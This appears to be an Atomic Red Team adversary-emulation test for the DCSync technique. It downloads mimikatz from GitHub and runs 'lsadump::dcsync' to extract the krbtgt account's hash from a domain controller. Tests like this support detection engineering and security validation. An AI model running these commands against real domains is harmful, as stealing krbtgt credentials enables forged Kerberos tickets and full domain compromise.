#TechniqueName: OS Credential Dumping: DCSync
#AtomicTestName: DCSync
#Language: cmd

#get_prereq_commands
$mimikatz_path = cmd /c echo %tmp%\mimikatz\x64\mimikatz.exe
Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20200918-fix/mimikatz_trunk.zip" -OutFile "$env:TEMP\mimikatz.zip"
Expand-Archive $env:TEMP\mimikatz.zip $env:TEMP\mimikatz -Force
New-Item -ItemType Directory (Split-Path $mimikatz_path) -Force | Out-Null
Move-Item $env:TEMP\mimikatz\x64\mimikatz.exe $mimikatz_path -Force


#prereq_commands
$mimikatz_path = cmd /c echo %tmp%\mimikatz\x64\mimikatz.exe
if (Test-Path $mimikatz_path) {exit 0} else {exit 1}


#commands
%tmp%\mimikatz\x64\mimikatz.exe "lsadump::dcsync /domain:example.com /user:krbtgt@example.com" "exit"
